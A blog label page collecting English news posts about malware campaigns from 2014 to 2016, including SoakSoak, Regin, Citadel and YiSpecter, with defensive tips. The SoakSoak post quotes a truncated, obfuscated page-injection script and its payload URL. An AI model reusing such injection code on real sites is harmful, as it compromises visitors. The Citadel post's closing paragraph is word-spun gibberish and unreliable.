Affichage des articles dont le libellé est Malware. Afficher tous les articles
Affichage des articles dont le libellé est Malware. Afficher tous les articles

Malware Stealing Money by Pretending to be Whatsapp, GooglePlay and Other Famous Apps

Hackers always seek to steal money from credit cards and other financial information. They are actively stealing credit card and other financial information using malware. In Europe, a new malware is originated that can spoof the user interfaces of Uber, Whatsapp, Google Play, Youtube and few other messaging apps.

This malware is already spread in countries like Denmark, Italy and Germany. The old traditional Phishing technique is used to deploy and spread this malware.

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details. In Phishing attack a clone is created of a website that acquires personal information from victim that is then emailed to the attacker.

In this case, the malware has been spreading through a Phishing campaign over SMS (Short Messaging Service). Once downloaded, the malware will create fake user interfaces of different apps on the phone. These interfaces further ask for credit card information and then send the entered data to the attacker.

This family of malware continues to evolve, earlier in February 2016 FireEyehad observed 55 malicious programs with same technique used. The earlier version was spoofing banking websites, but now this malware can spoof more popular applications like Youtube, Whatsapp and Google Play.

Users tend to input credit card information into these applications, FireEye researcher Wu Zhou said:
"Threat actors usually want to gain the largest financial benefit. So they typically target these apps that have a large user base”.

Nowadays, tricking victims into clicking on your malicious link is an easy task. The attacker used some easy tricks to make their links appealing to be clicked. To spread the malware, the hackers have sent a SMS messages with a link and tricked their victims into clicking on it. The SMS message said: “We could not deliver your order. Please check your shipping information here”.


According to research by FireEye, this malware is spread by five different campaigns and in one campaign hackers managed to get 130,000 clicks on their links where the malware was hosted.


Newer version of malware will be more powerful and undetectable, as only six out of 54 antivirus tools tested noticed the malicious coding behind these messages and emails. This malware is now has been found on servers in United Arab Emirates, Germany, Italy and the Netherland.


~ dimanche 10 juillet 2016 0 commentaires

5 Malware Scanners You Should Know About

For many years computers have been infected by malicious software, also known as “Malware”. It is specially designed to gain access or damage computer without the knowledge of owner. To protect user from any damage various anti-malware software have been developed.


Today we are going to discuss few best known anti-malware software that can be used to protect ourselves.

MalwareBytes’ Anti-Malware

MalwareBytes is Windows based anti-malware software. It scans the Windows for malicious software. Free version is available online with limited features and supports scheduled scan with paid version. The author of MalwareBytes claims to detect those malware that left undetectable by other anti malware scanners.


ClamAV

ClamAV is the most powerful open source malware scanner that provides integration with mail server and scans attached file for malware. It provides a flexible and scalable multi-threaded daemon, a command line scanner, and feature to update via Internet. Clam Anti Virus is based on a shared library and provides up to date virus database that you can use with your own software.


VirusTotal

VirusTotal is a web based anti malware scanner that analyzes submitted files for known viruses and malware. It is associated with many antivirus engines from different vendors and updates regularly with new signatures. It also alerts the antivirus vendors if the submitted file is not detected by their product.


SUPERAntiSpyware

SuperAntiSpyware is the best portable malware scanner that allows direct run from any USB drive without the need of installation that can be an issue on highly infected computer. The latest version is easily downloadable from the internet which saves trouble and time to update the software. The free version of SuperAntiSpyware does not include real time protection and update features.


EMCO Malware Destroyer

It is a malware scanning management tool to batch scans multiple computers for malware on a network without real time protection. EMCO’s free version provides only 1 scanning mode and allows scanning of single local and remote computer. It is quite fast because it checks infection based on the targeted definitions.



Many Cyber security professionals and individuals use these tools to scan for malicious software. Yet, there are many other scanners as well. 

~ dimanche 26 juin 2016 1 commentaires

Malware Information Sharing Platform & Threat Sharing

MISP, Malware Information Sharing Platform and Threat Sharing, is an open source software solution for collecting, storing, distributing and sharing cyber security indicators and threat about cyber security incidents analysis and malware analysis. MISP is designed by and for incident analysts, security and ICT professionals or malware reverser to support their day-to-day operations to share structured informations efficiently.

The objective of MISP is to foster the sharing of structured information within the security community and abroad. MISP provides functionalities to support the exchange of information but also the consumption of the information by Network Detection Intrusion System (NIDS), LIDS but also log analysis tools, SIEMs.

MISP, Malware Information Sharing Platform and Threat Sharing, core functionalities are:


  • An efficient IOC and indicators database allowing to store technical and non-technical information about malware samples, incidents, attackers and intelligence.
  • Automatic correlation finding relationships between attributes and indicators from malware, attacks campaigns or analysis.
  • Built-in sharing functionality to ease data sharing using different model of distributions. MISP can synchronize automatically events and attributes among different MISP. Advanced filtering functionalities can be used to meet each organization sharing policy including a flexible sharing group capacity and an attribute level distribution mechanisms.
  • And many more..
Exchanging info results in faster detection of targeted attacks and improves the detection ratio while reducing the false positives. We also avoid reversing similar malware as we know very fast that others team or organizations who already analyzed a specific malware.




~ mardi 10 mai 2016 0 commentaires

SamSam malware puts 2,100 servers at risk of Ransomware attack

A new study by Cisco Talos revealed that more than about 2,100 servers across 1,600 different networks have been compromised. The research by Cisco security personnel shows that, 'In past few months a ransomware campaign is going on which has changed the landscape of ransomware delivery.'

Cisco researchers discovered this SamSam malware last month; researchers find SamSam pretty different from the previous malwares - which encrypted data and demand ransoms. SamSam is not launched via user focused attack vectors, such as phishing campaigns and exploit kits.



This particular family seems to be dispense via compromising servers and using them as a foothold to move laterally through the network to compromise additional machines which are then held for ransom. The industries which may be targeted in coming days because of SamSam server attacks are; government departments, aviation companies, schools and universities.

According to the Cisco Talos blog post, "we scanned for machines that were already compromised and potentially waiting for a ransomware payload. We found just over 2,100 backdoors installed across nearly 1600 ip addresses."

How to evade SamSam Malware from encrypting your data 

If you diagnose a webshell on your organization's server; you need to act immediately and take proper steps to address the threat. 
  • Your first step should be to remove the external access of your server. This will give you time to respond and also prevent outside access to your servers. 
  • Second step should be re-imaging the systems and install the latest version of software. This is the best solution to prevent outside breach or access of your server. 
  • In case you failed to re-build totally, your only option left is to restore backup before the server was compromised. Then, update the server to the updated version before returning it to production. 


~ mardi 19 avril 2016 0 commentaires

First world countries are the primary target of Ransomwares

This year security researchers has discovered an immense increase in Ransomware attacks on businesses (regardless of their sizes) in Britain, USA, Canada, Australia and many other European nations. In Britain the number of ransomware attacks in first three months has been doubled when you compare it from last year. According to a research by cyber security firm Trend Micro, “January and February 2016’s combined figure is more than triple the infection count for the whole of the first quarter of 2015”.

Almost every developed nation around the world are facing a severe ransomware threat in 2016. In the first three months, the increase in ransomware attacks are so threatening that U.S and Canadian governments has issued alerts to their citizens about these ransomware attacks. Both countries issued these warnings after the researchers predicted the ransomware crisis will worsen as the year passes; because only few businesses have taken proper steps towards securing themselves from ransomware attacks.



Due to the lack of security measures U.S hospitals are the latest sector of America which fell victim to these ransomware attacks. A recent study revealed this week that around 52 percent of U.S hospitals were infected with malicious software's according to a study by The Health Information Trust Alliance. It further said that U.S hospitals should brace for a rise in ransomware attacks. The non – profit healthcare organization further added that; these ransomware attacks are going to be so devastating that U.S hospitals will have to accept attackers demands in order to regain access of their computer networks.

After the latest attack on MedStar Georgetown University Hospital this week, the FBI has provided the citizens some cyber safety tips. MedStar has suffered a devastating malware attack this Monday which has taken down the hospitals information technology systems. MedStar officials hasn’t yet confirmed weather the attack is an example of ransomware, but the patients data of has been compromised. The computer systems of MedStar’s 10 hospitals hasn’t yet restored to 100 percent after the devastating malware attack.

Jeffrey Coburn FBI Cyberdivison unit chief told; “In one case, a Los Angeles hospital paid $17,000. The FBItells users not to pay the ransoms.” Jeffrey Cobrun further added; “When you pay ransoms, you are continuing their business model. You are encouraging them to do this fraud.”

Fox IT a malware research firm discovered a ransomware family (Cryptowall, CryptoLocker, TorrentLocker) last year, whose members has generated some huge incomes. The attacks of these three malwares has happened in similar patterns and have affected mostly first world countries; mainly through exploit kits and fake emails posing as official organizations.

Security researchers are creating the solutions to remove ransomwares malware, and to some extent they seems successful, but this success will not last longer because of the social engineering techniques adopted by the hackers.


~ dimanche 3 avril 2016 0 commentaires

AceDeceiver: New iOS malware can infect any Apple device

A devastating iOS malware has been discovered today by PaloAlto researcher Claud Xiao; which has been dubbed as "AceDeceiver". AceDeceiver is the first of its kind because it doesn't require any enterprise certificates to install itself any iOS devices. This means regardless of the facts that your iOS device is non-jailbreak AceDeceiver malware can affect your iOS device.

The malware has exploited the flaws in Apple's digital rights management (DRM) protection mechanism FairPlay. This is the first incident when a FairPlay MITM technique has been used to spread malware. Previously we have seen only pirated iOS apps unfurl by using this technique. 'AceDeceiver' has raised many question on Apple's code review process.

Source: PaloAltoNetworks


So far the AceDeceiver has only infected iOS users of China. These attackers were using new techniques to bypass the Apple security codes. In a blog post published on PaloAlto; the reasons are mentioned which makes AceDeceiver more dangerous than any other iOS malware discovered before.


  • It doesn’t require an enterprise certificate, hence this kind of malware is not under MDM solutions’ control, and its execution doesn’t need user’s confirmation of trusting anymore.
  • It hasn’t been patched and even when it is, it’s likely the attack would still work on older versions of iOS systems.
  • Although the effected apps are removed from App Store; but that doesn't mean the malware has gone away. Attackers do not need the malicious apps to be always available in App Store for them to spread – they only require the apps ever available in App Store once, and require the user to install the client to his or her PC.
  • AceDeceiver doesn't require victim to install malicious app - instead it does that for them.  
  • The attack requires a user’s PC to be infected by malware first, after that, the infection of iOS devices is completed in the background without the user’s awareness.

There were three occasions when an app containing AceDeceiver malware has bypassed the Apple codes and landed in official App store. The first app was released in July last year - the second was released three months later, while the third one is released in January this year,

 The only similarity between those three apps are - all of them are wallpaper apps. These apps are removed from app store last month; but the goals of attackers may well have been accomplished. And also showed many that it's not impossible to bypass the security codes of App store. 
 

 


~ mercredi 16 mars 2016 0 commentaires

HackingTeam is back with Mac Malware

Italian company known as Hacking Team which sells surveillance software to governments agencies all over the world has been risen. This week a security researchers has identified a new malware, which is dubbed as 'dropper'.

The Hacking Team is out of business since last July; when an unknown Hacker compromised their servers and stole their data. The data include their source codes, exploits, government agencies names and emails- which were leaked on the internet by the unknown notorious hacker.




Now, they are back in business with malware which targets Apple's Mac OS X, according to Pedro Vilaca - a security researcher who works with Palo Alto. Vilaca wrote on his blog; "I just found some unique code in this dropper. This code checks for newer OS X versions and does not exist in the leaked source code. Either someone is maintaining and updating HackingTeam code or this is indeed a legit sample compiled by Hacking Team themselves. Reusage and repurpose of malware source code happens (Zeus for example) but my gut feeling and indicators seem to not point in that direction."

The hacking team has vowed last june; that they will be back. And oh boy didn't they announced their return with some style. Even though the codes are pretty much the same, but still it is enough for the malware to install the HackingTeam's Remote Control System (RCS).

Pedro Vilaca, the researcher who labelled HackingTeam as "Italian Morons" said, the technique is similar to the older version of HackingTeam's RCS and also the codes are similar to the one leaked last year.

How to check you Mac Device? 


  • To check if your mac device is infected look for Bs-V7qIU.cYL or _9g4cBUb.psr which is dropped into the ~/Library/Preferences/8pHbqThW/ directory

  • If any of these codes are detected on your device , your first step should be to delete the entire directory then remove the ~/Library/LaunchAgents/com.apple.FinderExtAvt.plist file.


~ mardi 1 mars 2016 0 commentaires

Amazon selling Android tablets with pre-installed Chinese Trojan

Android Tablets with pre-installed Trojan were sold on Amazon and some other online market places, which will install a malicious malware and corrupts antivirus apps silently from devices. The Trojan is dubbed as "Cloudsota", which was first discovered by the Cheetah Mobile Security Lab researchers.



This Trojan is developed by Chinese hackers according to Cheetah Mobile Security Lab researchers because the Trojan code, location of malware server and it was manufactured by Chinese companies. Cheetah Mobile Security Lab researchers posted the reviews of many customers who purchased these cheap Android tablets from online marketplaces like Amazon.

The researchers further identified that an attacker can remotely control these infected tablets. The number of tablets delivered which are infected with these Trojans are believed to be around 17,233 but there is a large number which is already been shipped by Amazon and other online marketplaces. 

Cloudsota infected devices are redirecting to some strange ads pages, automatically removing anti-virus apps, changing the users default home page. Because the Trojan has root permission, it will be restored automatically after rebooting the device. So, practically users cannot remove this Trojan from their devices.

United States, Mexico and Turkey are the countries where these pre-installed Trojan tablets are shipped. But the tablets with no brand name are believed to be highly effected according to the Cheetah Mobile research team. There are around 30 brands with are also infected with Cloudsota Trojan, but severity level is pretty low.

The Amazon and other online marketplaces are still selling these infected Trojans. So, people should avoid ordering any unbranded or low priced tablets from these marketplaces for now. Some Android tablet brands which are believed to be infected with Cloudsota Trojan are  JYJ 7, JEJA 7 Zoll, FUSION5, Alldaymall Tablet, Yuntab SZ Wave, and Tagital.

All of these infected tablets are manufactured by the Chinese manufactures, who didn't even responded to the Cheetah Mobile security lab when they suggested them to analyze their firmware. This is not the first time a n Android device is sold with a per-installed Trojan. People in Asia and Africa has been target before with the same type of campaigns.


~ mercredi 11 novembre 2015 0 commentaires

Kemoge Malware: A nightmare for Android users.

A malware name Kemoge was discovered by researchers on Wednesday which is effecting Android users in more than 20 countries.The malware was discovered by the Fireeye Researchers which they believe is written by Chinese developers or controlled by Chinese hackers. This malware can only effect users who install third-party apps in their android devices. But still Kemoge is spreading very quickly around the world.


Kemoge tricks a user through ads to install an app from third party source.The apps are duplicates of software that can be found on the Google Play Store. The key difference is that they attack the user's device after installation.

In a blog post written on Fireeye blog the researchers said that, " The attacker uploads the apps to third-party app stores and promotes the download links via websites and in-app ads. Some aggressive ad networks gaining root privilege can also automatically install the samples. On the initial launch, Kemoge collects device information and uploads it to the ad server, then it pervasively serves ads from the background. Victims see ad banners periodically regardless of the current activity (ads even pop up when the user stays on the Android home screen)." 

How can a Android user secure himself from Kemoge

The Kemoge Malware is still out there and it has effected many Android users in U.S too. It maybe not reached your country yet but with the way it is spreading it can hit your device before you even know it. Here are the few security tips which can help you prevent this malware from entering your device. 
  • Don't click on links from Advertisement, Emails, SMS or Websites. Kemoge can enter your device from these platforms. 
  • Try not to install third-party apps, only trust on apps from Android's App Store. 
  • Always keep you device up to date. Upgrading to the latest version of OS will provide some security, but it does not guarantee that you will remain protected. 



~ jeudi 8 octobre 2015 0 commentaires

YiSpecter Malware: No Apple User is Safe

Researchers on Monday discovered a new malware named YiSpecter which is effecting thousands of iPhones and iPads. Researchers of Palo Alto, a security firm first broke the news about the malicious malware which so far only effected Apple users from Taiwan and China. YiSpecter is the first of its kind malware because it is effecting both Jailbroken and Non-Jailbroken Apple devices, which is something researchers has never seen before.


This malware is so severe that it spreads via unusual means, including the hijacking of traffic from nationwide ISPs, an SNS worm on Windows, and an offline app installation and community promotion. Many victims have discussed YiSpecter infections of their jailbroken and non-jailbroken iPhones in online forums and have reported the activity to Apple.

The malware is infecting Apple devices since November 2014, but out of 57 security vendors in VirusTotal, only one is detecting the malware at the time of this writing. There are more than 100 apps in Apple's App Store, which is infected with YiSpecter Malware. This is the first time any malware has bypassed the Apple's notorious code reviews.

Some major attributes of YiSpecter Malware are: 


  • The malware can be downloaded and installed in your device regardless of the fact that its jailbroken or not. 
  • You cannot remove malware from your device once it is downloaded or installed. Even if you try to manually delete the malware it will re-appear on your device. 
  • Using third-party tools you can find some strange additional “system apps” on infected phones. 
  • Once YiSpecter Malware is installed in your device, normal apps start to show full screen advertisements when user try to open them. 
There is a malware named XcodeGhost which is similar to YiSpecter, these are the only malwares who effected non-jailbroken apple devices severally. But Plao Alto researchers believed that there is no connection between the developers of these malwares. However, YiSpecter is the first real world iOS malware that combines these two attack techniques and causes harm to a wider range of users. It pushes the line barrier of iOS security back another step.

So far there has been no statement released by the Apple regarding this news broken by Palo Alto researchers today.

~ lundi 5 octobre 2015 0 commentaires

Malware that can hack Facebook accounts infected over one million users(facebook hacking)




Over one million users were affected by malware that hacked into the Facebook accounts of these users. The malware was a part of two gaming applications and hence the spread reached over a million since these were relatively popular gaming applications.

These games are ‘Cowboy Adventure’ and ‘Jump Chess’. The malware is a Trojan named Android/Spy.Feabme.A and it collected the login ids and passwords of the users who installed it. 

These two applications were used to get the Facebook login credentials of the users and the malware could collect details of around a million accounts before it was detected.

The apps contained malware codes in a subtle way. It means that the gaming applications functioned normally and the users could actually enjoyed playing the game unaware of the fact that the applications contained malware.

The malware used a phishing mechanism to get the user details. It will open a fake Facebook screen asking users to enter their login details. The applications did not ask for account details at the time of installation and hence users would not suspect any malware activity. However, since it would open a face Facebook page, users would login in their details and would get an error that they are unable to login.

However, the details would get captured by the malware embedded in the application which would then be used to log into user accounts. The spread of malware was more than anything similar that has happened before. The applications could successfully get the approval from Google for getting published on Google Play Store.


Since the malware has been detected, the apps have been removed from the play store; however it was done only after affecting around a million Facebook accounts. Also, if someone tries to install these apps from some other store, Google issues a warning to them communicating about the malware in the application.


~ mardi 14 juillet 2015 0 commentaires

Stuxnet is the most high-profile piece of malware crashing Windows 95 and 98

At the RSA Conference 2015  held in San Francisco, it was announced that Stuxnet could have blown its cover and failed its sabotage mission due to a bug that allowed it to spread to ancient Windows boxes, malware analysts reckon.

The malware ruined Iran's Natanz uranium enrichment facility by subtly wrecking computer-controlled fuel centrifuges.



Stuxnet had to remain undetected to the Iranians or else it would have ruined the operation. Regrettably, a programming fault would have allowed it to spread to PCs running older and unsupported versions of Windows, and probably causing them to crash as a result. Those blue screens of death would have raised suspicions at the Natanz nuclear lab.


"Stuxnet could have been over before it started by crashing Windows 95 and Windows 98 systems,” Leder told the RSA security conference in San Francisco on Thursday.

"Unfortunately, someone had a bad day when they programmed Stuxnet, and swapped the characters and the result was that it was checking 'or' … which resulted in it installed on any version of Windows, even Windows 95 and 98 which were not supported.

At last, Stuxnet was able to successfully devastate the centrifuges before it was discovered in 2010. Stuxnet is just the most high-profile piece of malware in which the pair has found bugs. The duo said a programming error in the Conficker worm slashed its potential victim base.

Conficker, which attacked Windows machines across networks and the internet, should have infected nearly everybody. Instead, it could only scan a quarter of the entire IPv4 addresses due to a bug in the way it generated addresses at random.

Werner said at the RSA conference:

“If you sequentially attack victims, that are easily detected, so these guys did it a bit smarter, and chose addresses by random.”


~ vendredi 24 avril 2015 0 commentaires

Verizon found Millions of Mobile Devices to be Infected with Malware

According to a Verizon's new report, Data Breach Investigations Report 2015, it comes out that "we have got 99 problems, and mobile malware isn't even less than 1 percent of them."

Verizon revealed that out of tens of millions of mobile devices, the number of one’s infected with truly malicious exploits was "negligible," coming in at 0.03%.



It supports Google's findings in its Android 2014 Security Year in Review, released earlier this month, which disclosed that fewer than 1 percent of Android devices had a "potentially harmful app (PHA)" installed in 2014.

"we stripped away the "low-grade" malware and found that the count of compromised devices was truly negligible. The benefit of working with [Verizon's] internal team is that we knew how many devices were being monitored. An average of 0.03%  of smartphones per week - out of tens of millions of mobile devices on the Verizon network - were infected with "higher-grade" malicious code. This is an even tinier fraction than the overall 0.68% infection rate (of all types of unwanted software)" according to Kindsight Security Labs' biannual report.

Verizon has also discovered that the public sector is most at risk, followed by the tech sector, then banking and financial, with retail a close fourth (same as last year).

Accordind to the report, this year, organized crime is being frequently used as threat actor for web app attacks, with financial gain viewed as the most common of the primary motives for attacking.

The majority suffering is end-users. Obviously, mobile malware is both minimal and almost primarily a consumer problem, not an enterprise problem.

Android is crazy vulnerable, but not really being attacked. "Verizon Wireless data shows some 100 smartphones per week were infected, out of tens of millions of devices (mostly Android), for a 0.68% infection rate."

Verizon's report has mentioned that among the most infected Androids were hosting apps' adware and other "annoyance-ware." Android is the biggest mobile target of them all, as "most of the suspicious activity logged from iOS devices was just failed Android exploits." The report also stated that targeted malware is king on PCs, rather than on any mobile devices.

~ mercredi 15 avril 2015 0 commentaires

A Flawed Ransomware that Enables Victims to Evade Payment

A newly released strain of ransomware has been broken, allowing for victims to evade payment and access their locked data.

The Scraper ransomware, is in fact a Torlocker which was discovered in October last year and given the name Trojan-Ransom.Win32.Scrape. The ransomware encrypts a victim's files including documents, video, images and database copies and demands a ransom of at least $300 to unlock and decrypt documents.



However, the Scraper ransomware has a flaw in encryption algorithms means in about 70 per cent of cases files can be decrypted without submitting to the attacker's demands.

 Kaspersky Labs scrutinized the ransomware strain in detail and also mentioned in their blog post that victims can get their data back without giving into demands for money.

The crypto-ransom first appeared in an attack against Japanese users last year, later appeared in an English version. After landing on victim computer systems via the Andromeda botnet, the Trojan uses the Tor network and a proxy server to contact its owners.

After encrypting the files, the Trojan installs the following wallpaper on the user's desktop with a link to its executable file.

As explained by Kaspersky, “The user's files are encrypted with AES-256 with a randomly generated one-time key; an individual encryption key is created for each file. Then, a 512-byte service section is added to the end of each file, which consists of 32 bytes of padding, 4 bytes of the Trojan's identifier, and 476 bytes of the employed AES key encrypted with RSA-2048.”

Victims can re-download the malicious code and notify its operators that the ransom has been paid through a dedicated TorLocker window. The data is then sent through to a command and control (C&C) server which will respond with a private RSA key if money has changed hands. The ransomware supports payments made in Bitcoin, UKash and PaySafeCard.

The victims are intimidated to make payment through a timer system which threatens to delete the key necessary to decode files.


~ samedi 11 avril 2015 0 commentaires

Microsoft Addressed FREAK & Stuxnet Vulnerabilities

Microsoft has come up with the most important Patch Tuesday to address the "FREAK" security vulnerability, an encryption flaw that leaves device users vulnerable to having their electronic communications obstructed.

Microsoft's regularly scheduled Patch Tuesday also included an updated patch for Stuxnet, a five-year-old vulnerability that affects windows operating system. Stuxnet is viewed as potentially the most dangerous piece of computer malware discovered. It's been developed on an unrivalled scale and has the capability to target and control specified industrial machinery. Once the malware infects the system it can spread to other computers on the local intranet. It is not an internet-based piece of malware; it can spread through indirect internet usage.



The FREAK (Factoring RSA Export Keys) allows an attacker on your websites to use weakened encryption. Once a site's encryption is cracked, hackers can then steal data such as passwords, and hijack elements on the page.

Researchers said there was no evidence hackers had exploited the vulnerability, which they blamed on a former US policy that banned US companies from exporting the strongest encryption standards available. The restrictions were lifted in the late 1990s, but the weaker standards were already part of software used widely around the world, including Windows and the web browsers.

Microsoft confirmed that the encryption protocols used in all supported version of Windows were also vulnerable to the flaw. Microsoft has mentioned in its security bulletin that Apple's Safari and Google's Android browsers were also identified as being susceptible to the flaw.

Besides these two critical issues, the company has also revealed a set of other updates. Microsoft's March 2015 Patch Tuesday update includes a total of 14 security-related updates for 43 vulnerabilities affecting Internet Explorer, VBscript, Text Services, Adobe Font Drivers, and Office.

Microsoft's FREAK patch comes a day after the release of Apple iOS 8.2, which includes a fix designed to rectify the problem on Apple's mobile devices. Google has also developed a fix and is issuing to device makers and wireless carriers.

~ vendredi 13 mars 2015 0 commentaires

Xiaome Mi4 Detected with Preinstalled Malware


Bluebox, a mobile-security firm has discovered preinstalled malware and a host of other security issues with Xiaomi Mi 4 device. It seems that mobile device has been tampered by an unidentified third party.

Bluebox seeked to contact Xiaomi but did not get any response. Using some antivirus scanners, Bluebox detected that there were at least six suspicious apps were installed in the phone.

Xiaomi Mi4 Detected with pre installed malware
One of the applications was Yt Service which fills the device with invasive ads which tricks the phone into thinking that it comes directly from Google, which would likely reduce user's fears about the program.
The researcher also found risky software which was classified as Trojan that disguises itself as a verified Google application and allows hackers to hijack the phone. 

The device was further tested for further vulnerabilities. Andrew Blaich, Bluebox’s lead security analyst said that Mi 4’s operating system is a non-certified version of Android and is therefore subject to a number of flaws. Some of the bugs and security issues were discovered to be specific to old Android software, not its current release, leading them to believe that the OS was a mashup between the new KitKat 4.4.4. and an older form of Android.

The vulnerabilities may exist due to the reason that smartphone uses Xiaomi's own open-source MIUI build of Android, which has not been certified by Google. Android is actually open-source Linux software, and anyone can take the stock Android image and build on it.
The result is that the Xiaomi Mi4 is an exploitable jumble of two different versions of Android, KitKat and Jelly Bean, and is hostilely vulnerable to security faults from each. 

The analysis of the signatures of the apps creates a suspicion that the device may have been tempered because the signatures seem to differ from the manufacturer’s signing key.

~ lundi 9 mars 2015 0 commentaires

100’s of Thousands Wordpress Sites infected with Dangerous Malware

About 100,000 or more websites running the WordPress content management system have been compromised by mysterious malware that turns the infected sites into attack platforms that can target visitors, security researchers said.

source sucuri


The campaign has prompted Google to flag more than 11,000 domains as malicious, but many more sites have been detected as compromised, according to a blog post published Sunday by Sucuri, a firm that helps website operators secure their servers. Researchers have yet to confirm the cause of the infection, but they suspect it's related to a vulnerability in Slider Revolution, a WordPress plugin, that was disclosed in early September.


The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that looks like this:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));





Source sucuri
The code causes pages to download the malicious payload from hxxp://soaksoak.ru/xteas/code. Judging from some of the reader comments, some administrators were surprised to find that the sites they oversee were infected. Sucuri's free site check scanner will detect sites that are actively compromised. Disinfection involves removing malicious code added to a script located at wp-includes/template-loader.php. WordPress admins who use the Slider Revolution plugin should also ensure it's up to date.

Read Full Article on arstechnica


~ lundi 15 décembre 2014 0 commentaires

Who is Behind the sophisticated, stealthy Regin malware?

An advanced piece of malware has been uncovered, which has been in use as far back as 2008 to spy on governments, companies and individuals, Symantec said in a report released Sunday.


Symantec Security Response has discovered a new malware called Regin which, they say, "...displays a degree of technical competence rarely seen and has been used in spying operations against governments, infrastructure operators, businesses, researchers, and private individuals."
This back-door trojan has been in use, according to the security company, since at least 2008, and has stayed under the radar since.



The level of quality and the amount of effort put into keeping it secret convinces Symantec that it is a primary cyberespionage tool of a nation state.

Regin is a multi-stage attack, each stage but the first encrypted and none by themselves especially revealing about the overall attack. The picture only emerges when you have all five stages.

Attacks were committed between 2008 and 2011 (Regin 1.0), at which point the malware disappeared. It resurfaced in 2013 (Regin 2.0) with some significant differences: the new version is 64-bit, and may have lost a stage.

Symantec has not found a stage 3 for the 2.0 version, which may be explained by the fact that the 1.0 stage 3 is a device driver, and installing device drivers on 64-bit Windows surreptitiously is a difficult proposition even, it would seem, for the most sophisticated of attackers.

Attacks were committed between 2008 and 2011 (Regin 1.0), at which point the malware disappeared. It resurfaced in 2013 (Regin 2.0) with some significant differences: the new version is 64-bit, and may have lost a stage.

Symantec has not found a stage 3 for the 2.0 version, which may be explained by the fact that the 1.0 stage 3 is a device driver, and installing device drivers on 64-bit Windows surreptitiously is a difficult proposition even, it would seem, for the most sophisticated of attackers.

Symantec's description in their threat database of the threat, where they call it Backdoor.Trojan.GR, indicates that it was detected and protection provided on December 12, 2013. Presumably they did not know what they had until much more recently, and retrospective analysis revealed the true nature of the threat and its use prior years.

Even so, there is still

Read Full Article at ZDNET

~ dimanche 23 novembre 2014 0 commentaires

Hackers use Citadel Malware to attack password management apps

IBM’s Trusteer researchers have discovered a new configuration of the Citadel malware that attacks certain password managers. The configuration activates key logging when certain processes are running on the infected machine.




The targeted processes include Password Safe, and KeePass, two open-source password managers. The variant also targets the nexus Personal Security Client used to secure financial transactions and other services that require heightened security.


Password managers have become popular in the wake of breaches that have exposed millions of end-user credentials. Users collect all their passwords in a “vault” that is protected by a master password. In addition to added security, users can devise long and complex passwords that are hard to guess and that they don't have to remember since the password manager fills in the password field on the user’s log-on screen.

IBM discovered the variant on a machine that was protected by IBM Trusteer, a suite of security software. IBM bought the Israel company in Sept. 2013 for $1 billion.

The researchers say they are unsure how the variant got on the machine. In addition, the researchers said they did not know if it was an attack with a specific target or a random expedition by attackers to find what types of data they could collect.

“Password management and authentication programs are important solutions that help secure access to applications and Web Services,” Dana Tamir, director of enterprise security at Trusteer, wrote on IBM’s Security Intelligence blog. “If an adversary is able to steal the master password and gains access to the user/password database of a password management solution or compromise authentication technology, the attacker can gain unfettered access to sensitive systems and information.”

The Citadel Trojan is not new. It is a massively broadcast malware that has already compromised millions of computers worldwide. Once Citadel installs on a machine, it opens advice channels with a command-and-control (C&C) server and registers with it. The malware again receives a agreement book that tells it how it should operate, which targets what to attending for, what blazon of advice to capture, which functions to accredit and even provides advice about another C&Cs that acquiesce the attackers to yield down an apparent C&C and still accomplish the malware from a new C&C. As continued as the malware is communicating with the C&C, the agreement book can be adapted with advice about new targets, activities and C&C destinations.


Read full Article at ZDNET

~ jeudi 20 novembre 2014 0 commentaires

Not Compatible Malware a threat to Mobile users of Enterprises


NotCompatible.A, which researchers discovered in 2012, acted as a proxy on infected devices, but it didn't cause any direct damage. The mobile malware's authors did not use a complex command and control (C&C) architecture and communications were not encrypted, making it easy for security solutions to detect its activities.



New features in NotCompatible.C



The latest version of the threat, NotCompatible.C, is far more complex. According to Lookout, the authors have made it more difficult to detect and resilient to takedowns by implementing features usually found in mature PC-based malware.

Not Compatable C. uses peer-to-peer (P2P) communications between infected devices, which makes it resilient to IP and DNS blocking, and it relies on multiple C&C servers that are geographically distributed, which enables the malware to function properly even if law enforcement authorities manage to shut down individual servers.

The malware's authors have also started encrypting all C&C and proxied traffic, making it difficult for network security solutions to identify the malicious traffic. Furthermore, public key cryptography is used for mutual authentication between C&C servers and clients.

In an effort to protect their infrastructure, the cybercriminals use a gateway C&C to analyze incoming connections, and block those that come from IP addresses that are not trusted.

NotCompatible.C distribution and use

NotCompatible.C is distributed through spam campaigns and compromised websites. The attackers are not leveraging any exploits, but instead rely on social engineering to trick potential victims into installing the threat on their mobile devicese. One of the distribution campaigns observed by Lookout used the classic "security update" ruse.

According to the security firm, the cybercriminals have acquired compromised websites and accounts in bulk. In one of the spam runs seen by researchers, only Yahoo accounts had been used. In a different campaign, the attackers used only compromised AOL accounts.

These techniques have been successful. Lookout says its solutions have blocked hundreds of thousands of infection attempts in the United States and other countries around the world. In the U.S. for instance, NotCompatible reached encounter rates of more than 1% at its peak, researchers noted.

Read full Article at securityweek

~ mercredi 19 novembre 2014 0 commentaires